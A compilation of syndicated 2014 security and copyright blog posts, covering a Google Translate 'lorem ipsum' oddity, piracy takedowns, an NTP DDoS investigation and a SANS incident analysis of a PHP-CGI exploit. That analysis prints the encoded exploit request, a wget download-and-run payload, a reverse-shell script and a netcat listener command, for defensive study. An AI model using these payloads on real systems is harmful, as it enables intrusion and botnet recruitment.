This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Imagine discovering a secret language spoken only online by a knowledgeable and learned few. Over a period of weeks, as you begin to tease out the meaning of this curious tongue and ponder its purpose, the language appears to shift in subtle but fantastic ways, remaking itself daily before your eyes. And just when you are poised to share your findings with the rest of the world, the entire thing vanishes.

loremipsumThis fairly describes my roller coaster experience of curiosity, wonder and disappointment over the past few weeks, as I’ve worked alongside security researchers in an effort to understand how “lorem ipsum” — common placeholder text on countless Web sites — could be transformed into so many apparently geopolitical and startlingly modern phrases when translated from Latin to English using Google Translate. (If you have no idea what “lorem ipsum” is, skip ahead to a brief primer here).

Admittedly, this blog post would make more sense if readers could fully replicate the results described below using Google Translate. However, as I’ll explain later, something important changed in Google’s translation system late last week that currently makes the examples I’ll describe impossible to reproduce.

CHINA, NATO, SEXY, SEXY

It all started a few months back when I received a note from Lance James, head of cyber intelligence at Deloitte. James pinged me to share something discovered by FireEye researcher Michael Shoukry and another researcher who wished to be identified only as “Kraeh3n.” They noticed a bizarre pattern in Google Translate: When one typed “lorem ipsum” into Google Translate, the default results (with the system auto-detecting Latin as the language) returned a single word: “China.”

Capitalizing the first letter of each word changed the output to “NATO” — the acronym for the North Atlantic Treaty Organization. Reversing the words in both lower- and uppercase produced “The Internet” and “The Company” (the “Company” with a capital “C” has long been a code word for the U.S. Central Intelligence Agency). Repeating and rearranging the word pair with a mix of capitalization generated even stranger results. For example, “lorem ipsum ipsum ipsum Lorem” generated the phrase “China is very very sexy.”

Until very recently, the words on the left were transformed to the words on the right using Google Translate.

Until very recently, the words on the left were transformed to the words on the right using Google Translate.

Kraeh3n said she discovered the strange behavior while proofreading a document for a colleague, a document that had the standard lorem ipsum placeholder text. When she began typing “l-o-r..e..” and saw “China” as the result, she knew something was strange.

“I saw words like Internet, China, government, police, and freedom and was curious as to how this was happening,” Kraeh3n said. “I immediately contacted Michael Shoukry and we began looking into it further.”

And so the duo started testing the limits of these two words using a mix of capitalization and repetition. Below is just one of many pages of screenshots taken from their results:

ipsumlorem

The researchers wondered: What was going on here? Has someone outside of Google figured out how to map certain words to different meanings in Google Translate? Was it a secret or covert communications channel? Perhaps a form of communication meant to bypass the censorship erected by the Chinese government with the Great Firewall of China? Or was this all just some coincidental glitch in the Matrix?

For his part, Shoukry checked in with contacts in the U.S. intelligence industry, quietly inquiring if divulging his findings might in any way jeopardize important secrets. Weeks went by and his sources heard no objection. One thing was for sure, the results were subtly changing from day to day, and it wasn’t clear how long these two common but obscure words would continue to produce the same results.

“While Google translate may be incorrect in the translations of these words, it’s puzzling why these words would be translated to things such as ‘China,’ ‘NATO,’ and ‘The Free Internet,’” Shoukry said. “Could this be a glitch? Is this intentional? Is this a way for people to communicate? What is it?”

When I met Shoukry at the Black Hat security convention in Las Vegas earlier this month, he’d already alerted Google to his findings. Clearly, it was time for some intense testing, and the clock was already ticking: I was convinced (and unfortunately, correct) that much of it would disappear at any moment.

A BRIEF HISTORY OF LOREM IPSUM

Cicero.

Cicero.

Search the Internet for the phrase “lorem ipsum,” and the results reveal why this strange phrase has such a core connection to the lexicon of the Web. Its origins in modernity are murky, but according to multiple sites that have attempted to chronicle the history of this word pair, “lorem ipsum” was taken from a scrambled and altered section of “De finibus bonorum et malorum,” (translated: “Of Good and Evil,”) a 1st-Century B.C. Latin text by the great orator Cicero.

According to Cecil Adams, curator of the Internet trivia site The Straight Dope, the text from that Cicero work was available for many years on adhesive sheets in different sizes and typefaces from a company called Letraset.

“In pre-desktop-publishing days, a designer would cut the stuff out with an X-acto knife and stick it on the page,” Adams wrote. “When computers came along, Aldus included lorem ipsum in its PageMaker publishing software, and you now see it wherever designers are at work, including all over the Web.”

This pair of words is so common that many Web content management systems deploy it as default text. Case in point: Lorem Ipsum even shows up on healthcare.gov. According to a story published Aug. 15 in the Daily Mail, more than a dozen apparently dormant healthcare.gov pages carry the dummy text. (Click here if you skipped ahead to this section).

LOREMipsumhealthcare

FURTHER TESTING

Things began to get even more interesting when the researchers started adding other words from the Cicero text from which the “lorem ipsum” bit was taken, including: “Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit . . .”  (“There is no one who loves pain itself, who seeks after it and wants to have it, simply because it is pain …”).

Adding “dolor” and “sit” and “consectetur,” for example, produced even more bizarre results. Translating “consectetur Sit Sit Dolor” from Latin to English produces “Russia May Be Suffering.” “sit sit dolor dolor” translates to “He is a smart consumer.” An example of these sample translations is below:

ipsum

Latin is often dismissed as a “dead” language, and whether or not that is fair or true it seems pretty clear that there should not be Latin words for “cell phone,” “Internet” and other mainstays of modern life in the 21st Century. However, this incongruity helps to shed light on one possible explanation for such odd translations: Google Translate simply doesn’t have enough Latin texts available to have thoroughly learned the language.

In an introductory video titled Inside Google Translate, Google explains how the translation engine works, the sources of the engine’s intelligence, and its limitations. According to Google, its Translate service works “by analyzing millions and millions of documents that have already been translated by human translators.” The video continues:

“These translated texts come from books, organizations like the United Nations, and Web sites from all around the world. Our computers scan these texts looking for statistically significant patterns. That is to say, patterns between the translation and the original text that are unlikely to occur by chance. Once the computer finds a pattern, you can use this pattern to translate similar texts in the future. When you repeat this process billions of times, you end up with billions of patterns, and one very smart computer program.”

Here’s the rub:

“For some languages, however, we have fewer translated documents available, and therefore fewer patterns that our software has detected. This is why our translation quality will vary by language and language pair.”

Still, this doesn’t quite explain why Google Translate would include so many references specific to China, the Internet, telecommunications, companies, departments and other odd couplings in translating Latin to English.

In any case, we may never know the real explanation. Just before midnight, Aug. 16, Google Translate abruptly stopped translating the word “lorem” into anything but “lorem” from Latin to English. Google Translate still produces amusing and peculiar results when translating Latin to English in general.

A spokesman for Google said the change was made to fix a bug with the Translate algorithm (aligning ‘lorem ipsum’ Latin boilerplate with unrelated English text) rather than a security vulnerability.

Kraeh3n said she’s convinced that the lorem ipsum phenomenon is not an accident or chance occurrence.

“Translate [is] designed to be able to evolve and to learn from crowd-sourced input to reflect adaptations in language use over time,” Kraeh3n said. “Someone out there learned to game that ability and use an obscure piece of text no one in their right mind would ever type in to create totally random alternate meanings that could, potentially, be used to transmit messages covertly.”

Meanwhile, Shoukry says he plans to continue his testing for new language patterns that may be hidden in Google Translate.

“The cleverness of hiding something in plain sight has been around for many years,” he said. “However, this is exceptionally brilliant because these templates are so widely used that people are desensitized to them, and because this text is so widely distributed that no one bothers to question why, how and where it might have come from.”

SANS Internet Storm Center, InfoCON: green: Web Server Attack Investigation – Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With Windows malware getting so much attention nowadays, it’s easy to forget that attackers also target other OS platforms. Let’s take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server’s firewall blocked it with the 403 Forbidden HTTP status code error. However, that response was sufficient for the attacker’s tool to confirm that it located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected “PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script,” according to MITRE. The ISS advisory noted that,

“PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system.”

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that “one of the key modifications is to specify ‘auto_prepend_file=php://input‘ which will allow the attacker to send PHP code in the request body.”

The Exploit’s Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker’s server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for “phpR05″ showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here’s a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit’s Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker’s server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn’t use SSH. Instead, it expected the attacker’s server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, ‘nc -l -p 22‘ directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., ‘whoami‘).

Interestingly, the production server’s logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by “noptrix,” which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker’s infrastructure included 3 different IP addresses, none of which were blacklisted at the time of the incident.

– Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers’ IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Ferguson Attacks And Web Censorship Are Parts Of Same Story

This post was syndicated from: TorrentFreak and was written by: Rick Falkvinge. Original post: at TorrentFreak

The governments around the world are reacting the exact same way today as they did when the printing press arrived 500 years ago. There isn’t really anything new under the sun.

Then, as now, they were used to telling people what was true and what wasn’t, telling whatever story that fit whatever it was they wanted to do.

“Cannabis is dangerous. Tobacco is not harmful at all. Oh, and there are weapons of mass destruction in Iraq.”

When police troops in Ferguson launched tear gas grenades at a television team from Al-Jazeera, that is a symptom of the exact same thing as web censorship: governments are losing control of the story. Governments can no longer invent whatever truth that fits what they want to happen. Police firing at press is actually something very rare – even in the worst of war zones, it’s a rare occurrence that press teams are deliberately targeted, and yet, this was precisely what happened in Ferguson, USA.

The reason is the exact same as for web censorship and mass surveillance:

The governments and the people working for them are attacking anybody who exposes what they do, using whatever power they have to do so.

Tear gas grenades against a TV crew may have been both overviolent and counterproductive, but it’s still the same thing. It’s exactly what happened when the printing press arrived, and the penalties for using a printing press – thereby circumventing the truthtellers of that time – gradually increased to the death penalty (France, 1535).

Not even the death penalty worked to deter people from using the printing press to tell their version of events to the world, which more often than not contradicted the official version. The cat was out of the bag. As it is now. Governments and police still don’t understand that everybody is a broadcaster – attacking a TV crew was futile in the first place.

During the initial, hopeful months of the Arab Spring, a lot of photos circulated of young people gathering for protests. What was interesting about the photos were that they were taken with mobile phones, but also that they showed a lot of other people at the protest taking photos of the same crowd at the same time with their own mobile phone. Thus, the photos of the ongoing revolution contained instructions in themselves for how to perpetuate the revolution – take pictures of crowds defying the edicts and dictums.

This is why it’s so puzzling that the police even bother to give special treatment to people from television stations and newspapers. Strictly speaking, they’re not necessary to get the story out anymore, even if they still have some follower advantage for the most part.

“Police are being transformed from protecting the public into protecting government from the public”, as @directorblue just tweeted. That could be said about pretty much anything concerning the net, too — from oppressive applications of copyright monopoly law to strangling net innovations or giving telcos monopolies that prevent the net’s utility.

The attacks on the public by police troops in Ferguson, attacks from the copyright industry against those who want a free net, and web censorship by governments are all different sides of the same story. And all of this has happened before. Last time this happened, it took 200 years of civil war to settle the dust and agree that the printing press may have been a nice invention after all.

Can we please not repeat that mistake?

About The Author

Rick Falkvinge is a regular columnist on TorrentFreak, sharing his thoughts every other week. He is the founder of the Swedish and first Pirate Party, a whisky aficionado, and a low-altitude motorcycle pilot. His blog at falkvinge.net focuses on information policy.

Book Falkvinge as speaker?

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Part 1: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

For the last year or so, I have been investigating UDP DDOS attacks. In this diary I would like to spotlight a somewhat surprising scenario where a manufacturer’s misconfiguration on a popular consumer device combined with a design decision in a home gateway router may make you an unwitting accomplice in amplified NTP reflection DDOS attacks.

This is part 1 of the story.  I will publish the conclusion Tuesday August 19th.

Background

Today almost every house has consumer broadband services.  Typical broadband installations will have a device, usually provided by your service provider, which acts as a modem, a router and a firewall (for the rest of the diary this device will be called a gateway router).   In a nutshell the firewall in the gateway router permits network traffic initiated on your network out to the Internet, and permits responses to that traffic back into your network.  Most importantly the firewall will block all traffic destined for your network which is not a response to traffic initiated from your network.  This level of firewall capability meets the requirements of almost all broadband consumers on the Internet today.   

For those of us power users who required more capability, gateway router manufacturers tended to support a port forwarding feature that would allow us to accommodate servers and other devices behind the firewall.  This was great for us tech-savvy folk, but typically port forwarding was beyond the understanding of the average Internet user like my Dad (sorry Dad!) or my Grandma.

In the last few years consumer devices that plug into your home network and use more complicated networking, that does not fit the standard initiate-respond model, have become more common.  The most common of those is gaming consoles, but other devices like home automation, storage devices and others can also be an issue.  As stated above setting up port forwarding so these devices will function properly is beyond the average Internet users’ capability.  Luckily the gateway router vendors have thought of that as well. 

To simplify connecting these devices, gateway router vendors tend to implement one of two ways of supporting these devices.  Most support Universal Plug and Play (UPnP) with a minority of  vendors supporting Full-cone NAT.  

Investigation

It begins with a complaint from a reputable source that a customer is participating in a reflective NTP DDOS attack utilizing monlist for amplification.

The complaint is against XXX.160.28.174, a dynamic address broadband customer.  The analyst’s first thought is that this is a tech-savvy user has setup a NTP server and added port forwarding to their router.  It should be easy to resolve. Contact the customer and tell him to patch his NTP server to the current version and everything will be great!  Unfortunately, this is where things go sideways.

While network monitoring clearly shows this customer’s connection participating in a NTP DDOS attack:

Review of the firewall configuration showed that there are no ports forwarded on the firewall.

But the NAT logs in the firewall show a large number of outbound connections to various addresses originating from this device and most of them don’t appear to be to NTP servers. 

172.16.1.64:123, f: 192.75.12.11:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 199.182.221.110:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 142.137.247.109:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 129.128.5.211:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 206.108.0.132:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 94.185.82.194:443, n: XXX.160.28.174:123
172.16.1.64:123, f: 60.226.113.100:80, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:38553, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:47782, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:53177, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:43397, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:15673, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:17275, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:63467, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:56970, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:64682, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:26332, n: XXX.160.28.174:123
172.16.1.64:123, f: 101.166.182.210:80, n: XXX.160.28.174:123

According to the NAT table, the address behind the gateway router that is initiating the outbound UDP sessions is at 172.16.1.64. The device table shows it as:

Name: home-controller-300-000FFF13C150
Hardware Address: 00:0f:ff:13:c1:50

That MAC address is owned by a company called Control4 who makes popular home automation devices. It is clear that the Control4 device has a configuration problem.  There is likely no reason for Control4 to be running an NTP server on a home automation device, and certainly that NTP server should not support the monlist command. Most likely this a result of the Linux/Unix difficulty that when you implement an NTP client on a *nix platform you almost always wind up with an NTP server getting enabled as well which you need to manually disable. Either way, I was in contact with Control4, and they were aware of the issue and have released a patch and any Control4 devices that call home to the mothership should be resolved.  Unfortunately they have a significant number of devices that, for some reason, don’t call home and can’t be patched until they do.  But this is not just a Control4 problem.  In the course of my investigation I found Macintosh computers, FreeNAS devices, Dell Servers and Dlink Storage devices displaying the same behavior. But even if there is a misconfigured NTP server on these networks, if the firewall is working properly, then no uninitiated connections should be permitted into these, and these devices should not be capable of being used as a reflector.

An nmap scan shows that not only is it possible to connect through the firewall, but that there is clearly an NTP server answering queries and that permits the monlist command, maximizing the amplification.

123/udp open          ntp     NTP v4

| ntp-monlist: 

|   Target is synchronised with 206.108.0.133

|   Alternative Target Interfaces:

|       172.16.1.64     

|   Public Servers (4)

|       142.137.247.109 174.142.10.100  198.27.76.239   206.108.0.133   

|   Other Associations (166)

|       24.220.174.96 seen 7615 times. last tx was unicast v2 mode 7

|       193.25.121.1 seen 2084 times. last tx was unicast v2 mode 7

|       66.26.0.192 seen 406 times. last tx was unicast v2 mode 7

|       109.200.131.2 seen 11079 times. last tx was unicast v2 mode 7

|       79.88.149.109 seen 15356 times. last tx was unicast v2 mode 7

|       66.176.8.42 seen 90397 times. last tx was unicast v2 mode 7

|       84.227.75.171 seen 58970 times. last tx was unicast v2 mode 7

|       82.35.229.219 seen 952 times. last tx was unicast v2 mode 7

|       96.20.156.186 seen 2123 times. last tx was unicast v2 mode 7

|       216.188.239.159 seen 178 times. last tx was unicast v2 mode 7

|       184.171.166.72 seen 923 times. last tx was unicast v2 mode 7

|       94.23.230.186 seen 96 times. last tx was unicast v2 mode 7

… total of 166 entries

 

This is where I will end the story for now. What do you think is happening?  Conclusion Tuesday August 19th.

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: WWE Asked Google to Hit Live Piracy…From the Future

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

WWE2Removing content from the Internet has become big business in recent years, with rightsholders from all over the globe seeking to limit access to infringing content.

As the world’s leading search engine, Google receives millions of DMCA-style notices every week. Its internal systems, both automated and human-reviewed, then attempt to assess the validity of the notices before removing URLs from its indexes.

What these notices all have in common is that they refer to infringements that have already taken place, since that’s the nature of a takedown. However, a notice that recently appeared in Google’s Transparency Report reveals that for at least one organization, looking into the future is now also on the agenda.

The notice was sent by an anti-piracy company working on behalf of World Wrestling Entertainment, or WWE as it’s more commonly known. The notice aimed to tackle piracy of a WWE Event titled Money In The Bank 2014, which took place on June 29, 2014. However, the notice was sent to Google two days before, on June 27.

“The following links infringe on WWE’s copyrighted Pay Per View event Money In The Bank 2014, set to air this Sunday, June 29, by one or more of the following means,” the notice begins.

WWE then sets out three potential infringements.

wwe-bank

“Providing a link to a free (pirated) stream of this event” is misleading since it’s impossible to link to an event that hasn’t aired yet. Conceivably an advance static link could have been setup to air the event come June 29, but on June 27 the event had definitely not aired, hence no piracy.

“Providing a promise of DIRECT free streaming of this event on the identified site” seems no different from the allegation made above. It’s certainly possible that some of the sites promised to illegally stream the event, but at the date of the notice that would have been impossible.

The fact that WWE resorted to telling Google that the event’s predictions show was the source material being infringed upon shows that no actual live event infringements had yet taken place.

The final claim – “Using copyrighted images, logos and celebrity photos to promote the site” – is one that carries far more weight than the two key instances of infringement alleged above. Some of the sites listed did use WWE artwork to promote their upcoming streams, but there were some notable omissions, not least the homepage of Justin.tv. Google refused to comply in this and three other instances.

The notice from WWE, which can be viewed here, illustrates the problems faced by companies airing live events. While outfits such as WWE often know where streams and links to streams will appear once an event goes live, taking them down quickly once it actually begins may not always go as smoothly as they would like.

While attempts at a pro-active DMCA-style notice like this might work on a small scale, it’s not difficult to imagine the chaos that would ensue if all rightsholders tried to have unauthorized content removed before it even appeared online.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: TalkTalk Wants Resellers to Warn Pirating Customers

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

talktalklogoUnlike those in the US, Internet providers in the UK are not obliged to forward copyright infringement notices to their subscribers. This means that local Internet users are spared the typical warnings that are so common elsewhere.

Despite the lacking legal requirements, some anti-piracy groups do send copyright infringement notices to UK ISPs. In most cases these are ignored by the providers, but last week TalkTalk forwarded a notice to one of its resellers.

In the email the ISP asks Opal Solutions to forward the notice in question to one of its subscribers who allegedly shared a pirated copy of “Godzilla”. In addition the reseller was urged to take “preventive” measures, but what these should be is left open.

“Please see below copyright infringement email regarding an IP address of one of your clients, Please inform your client and take necessary preventative measures,” TalkTalk wrote.

At the bottom of this article is a copy of the original copyright infringement notice TalkTalk forwarded. It is a typical DMCA style notice sent by IP Echelon on behalf of Warner Bros.

IP Echelon didn’t make any effort to customize the notice for the UK audience. The email specifically references US copyright law, which doesn’t apply to the reseller or TalkTalk.

What’s most noteworthy, though, is that TalkTalk has decided to pass on this notice. The ISP is not known to forward these notices to its own subscribers, yet they appear to be urging a reseller to go beyond what’s required by law.

The forwarded email is most likely an attempt to avoid any type of liability. The question that remains is this: if TalkTalk do this with resellers does this mean they will start warning their subscribers as well?

Earlier this year the news broke that TalkTalk and other UK providers will voluntarily start sending infringement notices under the VCAP program. While VCAP isn’t going into effect before the summer of 2015, TalkTalk’s forwarded infringement notice could suggest that they might do something sooner.

Below is a full copy of the copyright infringement notice.

—-

We are writing this message on behalf of Warner Bros. Entertainment Inc..

We have received information that an individual has utilized the
below-referenced IP address at the noted date and time to offer
downloads of copyrighted material.

The title in question is: Godzilla

The distribution of unauthorized copies of copyrighted television
programs constitutes copyright infringement under the Copyright Act,
Title 17 United States Code Section 106(3). This conduct may also
violate the laws of other countries, international law, and/or treaty
obligations.

Since you own this IP address
we request that you immediately do the following:

1) Contact the subscriber who has engaged in the conduct described
above and take steps to prevent the subscriber from further downloading
or uploading Warner Bros. Entertainment Inc. content without authorization; and

2) Take appropriate action against the account holder under your Abuse
Policy/Terms of Service Agreement.

On behalf of Warner Bros. Entertainment Inc., owner of the exclusive rights
in the copyrighted material at issue in this notice, we hereby state that
we have a good faith belief that use of the material in the manner
complained of is not authorized by Warner Bros. Entertainment Inc.,
its respective agents, or the law.

Also, we hereby state, under penalty of perjury, that we are authorized
to act on behalf of the owner of the exclusive rights being infringed
as set forth in this notification.

We appreciate your assistance and thank you for your cooperation in this
matter. Your prompt response is requested.

Any further enquiries can be directed to copyright@ip-echelon.com
Please include this message with your enquiry to ensure a swift response.

Respectfully,

Adrian Leatherland
CEO
IP-Echelon
Email: copyright@ip-echelon.com
Address: 6715 Hollywood Blvd, Los Angeles, 90028, United States

- ————- Infringement Details ———————————-
Title: Godzilla
Timestamp: 2014-08-13T14:06:26Z
IP Address:
Port: 60261
Type: BitTorrent
Torrent Hash: c5cdf551eea353484657d45dbe93f688575a1e31
Filename: Godzilla.2014.WEBRiP.XviD-VAiN
Filesize: 2485 MB
- ———————————————————————

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Issues with Microsoft Updates, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Microsoft has updated some bulletins because there are three known issues that can affect your computer.

  • when KB2982791 is installed, fonts that are installed in a location other than the default fonts directory (%windir%fonts) cannot be changed when they are loaded into any active session
  • Fonts do not render correctly after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012
  • Microsoft is investigating behavior in which systems may crash with a 0×50 Stop error message (bugcheck) after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

If you have not installed yet those updates, please don’t install it until Microsoft pubish a fix. If you already installed it, please check each article for mitigation measures.

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: I Visited Pirate Bay’s Peter Sunde in Prison, Here’s What he Had to Say

This post was syndicated from: TorrentFreak and was written by: Julia Reda. Original post: at TorrentFreak

sunde-small— by Julia Reda

It wasn’t easy to meet Peter in prison. Initially, his request for the approval of my visit was rejected, as have been requests on behalf of other friends. It was only when he read up on the regulations and filed a complaint – pointing out my status as an elected representative of the European Parliament – that my visit was approved.

He tells me that this is par for the course in prison. “If you don’t constantly insist upon your rights, you will be denied them”. Repeatedly, he had to remind the guards that they’re not allowed to open confidential mail he receives from journalists. His alleged right to an education or occupation during his jail time in practice amounted to being given a beginners’ Spanish book.

“Prison is a bit like copyright,” Peter remarks. In both areas, there is a lack of transparency and the people in power profit from the fact that the average person doesn’t pay a lot of attention to the issue. That opens the door to misuse and corruption.

Few people feel directly affected by these systems (even though a lot of Internet users commit copyright infringements, many don’t even realize that they are breaking laws and suffer no repercussions). Hence it is difficult to get traditional politics to change even the most blatant injustices that these systems produce. I ask him whether his imprisonment has changed his political views.

“It has confirmed them,” he replies. “I knew the system was broken before, but now I know to what extent.”

“The worst thing is the boredom”, Peter informs me when I ask him about life in prison. He gives an account of his daily routine: “I have soy yoghurt and muesli for breakfast, which I was recently allowed to buy from my own money, as the prison doesn’t offer any vegan food.”

That is followed by one hour of exercise – walking around the yard in circles – and sometimes the chance to play ping-pong or visit the prison library in the afternoon, before Peter is locked in his cell for the night. The only other distraction comes from the dozens of letters Peter receives every day.

Not all the books that his friends and supporters send make their way to him – they are screened for “inappropriate content” first. Other items that arrive in the mail, such as vegan candy, won’t be handed out to him until after his release, “but at least the prison has to catalog every single thing you send me, which pisses them off,” Peter says with a wink.

While his notoriety mostly comes from his role in founding the Pirate Bay, Peter has been critical of the platform’s development for a long time and has been focusing his energy on other projects.

“There should be 10,000 Pirate Bays by now!” he exclaims. “The Internet was built as a decentralized network, but ironically it is increasingly encouraging centralization. Because The Pirate Bay has been around for 11 years now, almost all other torrent sites started relying on it as a backbone. We created a single point of failure and the development of file sharing technology got stuck.”

